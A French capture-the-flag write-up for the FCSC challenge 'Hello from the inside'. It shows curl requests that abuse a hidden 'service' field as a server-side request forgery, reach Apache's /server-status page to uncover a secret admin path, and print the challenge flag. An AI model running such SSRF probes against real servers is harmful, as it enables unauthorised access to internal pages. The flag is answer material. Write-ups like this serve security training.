# Hello from the inside

## Énoncé

Votre nouveau stagiaire aimerait bien vous persuader que les architectures orientées micro-service améliorent nettement la sécurité de vos systèmes d'information.

Il a décidé de vous le démontrer en réalisant une preuve de concept du type "Hello world", déployé à la hâte sur un serveur HTTP Apache.

Allez-vous lui proposer un contrat à la fin de son stage ?

https://hello-from-the-inside.france-cybersecurity-challenge.fr/

**Note** : Aucun bruteforce n'est nécessaire à la résolution du challenge.

## Solution

On consulte la page en question :

![](hello.png)

Et si on saisit quelque chose, sans surprise :

![](world.png)

Regardons ce qui se passe derrière :

![](request.png)

Tiens, il y a un champ caché dans le formulaire. Essayons de jouer avec...

```console
$ curl https://hello-from-the-inside.france-cybersecurity-challenge.fr/ -d "name=plop&service=hello-microservice"
[...]
        <h1 class="mt-5">Hello?</h1><pre><code class="small">Hello plop
</code></pre>      </div>
[...]
```

C'est le cas normal. Si on change le `service` :

```console
$ curl https://hello-from-the-inside.france-cybersecurity-challenge.fr/ -d "name=plop&service=plop"
[...]
          <p class="lead"></i>Hello from the inside</i> uses a novel technic to greet users: microservices.</p>
[...]
```

Ça mouline pendant plusieurs secondes, puis la page initiale réapparaît.
Cela ressemble à un problème réseau. Se pourrait-il que `service` soit 
un hostname ? Cela ferait sens dans une architecture micro-service.

J'ai essayé plusieurs hostnames différents, comme `admin-microservice`,
`google.fr` ou encore un serveur qui m'appartient. Sans résultat, puis j'ai
tenté `localhost` :

```console
$ curl https://hello-from-the-inside.france-cybersecurity-challenge.fr/ -d "name=plop&service=localhost"
[...]
    &lt;main class=&quot;flex-shrink-0&quot;&gt;
      &lt;div class=&quot;container&quot;&gt;
                  &lt;h1 class=&quot;mt-5&quot;&gt;Hello from the inside&lt;/h1&gt;
          &lt;p class=&quot;lead&quot;&gt;&lt;/i&gt;Hello from the inside&lt;/i&gt; uses a novel technic to greet users: microservices.&lt;/p&gt;
          &lt;form class=&quot;d-flex&quot; method=&quot;POST&quot;&gt;
            &lt;input class=&quot;me-2&quot; type=&quot;name&quot; placeholder=&quot;Your name&quot; aria-label=&quot;Your name&quot; name=&quot;name&quot;&gt;
            &lt;input type=&quot;hidden&quot; name=&quot;service&quot; value=&quot;hello-microservice&quot;&gt;
            &lt;button class=&quot;btn btn-outline-success&quot; type=&quot;submit&quot;&gt;Hello?&lt;/button&gt;
          &lt;/form&gt;
          &lt;p&gt;&lt;code class=&quot;small&quot;&gt;For educational use only.&lt;/code&gt;&lt;/p&gt;
              &lt;/div&gt;
[...]
```

Intéressant ! On a en résultat la page d'accueil en HTML échappé, au 
centre de... la page d'accueil. Ce qui est logique puisque le serveur 
s'est appelé lui-même ! Et c'est à cet instant que je me rends compte 
qu'on est en présence d'[une SSRF](https://portswigger.net/web-security/ssrf).

Immédiatement, je tente un `file:///`, mais ça ne passe pas.
Puis je commence à rechercher des URLs qui pourraient exister sur
un serveur Apache standard (sur lequel l'énoncé semble insister). `/admin` ? `/.htaccess` ? `/.htpasswd` ? Sans résultat, jusqu'à... `/server-status` ?

```console
$ curl https://hello-from-the-inside.france-cybersecurity-challenge.fr/ -d "name=plop&service=localhost/server-status"
[...]
&lt;/td&gt;&lt;td&gt;172.22.13.4&lt;/td&gt;&lt;td&gt;http/1.1&lt;/td&gt;&lt;td nowrap&gt;172.22.13.2:80&lt;/td&gt;&lt;td nowrap&gt;GET /fcsc-secret-admin-page-5d7f93d6/ HTTP/1.1&lt;/td&gt;&lt;/tr&gt;
[...]
```

Pour rappel, `/server-status`  est exposé par le module `mod_status` et 
fournit des statistiques sur l'usage du serveur, avec une granularité
qui descend jusqu'à la page. Je n'ai laissé que ce qui est réellement intéressant dans ces résultats, à savoir une page secrète. Suivons la...

```console
$ curl https://hello-from-the-inside.france-cybersecurity-challenge.fr/ -d "name=plop&service=localhost/fcsc-secret-admin-page-5d7f93d6/"
[...]
        <h1 class="mt-5">Hello?</h1><pre><code class="small">FCSC{b7701b7c6a40ac1ec27ea7ade92fbe7b74c1444b13047a795435fb4d8c549828}</code></pre>      </div>
[...]
```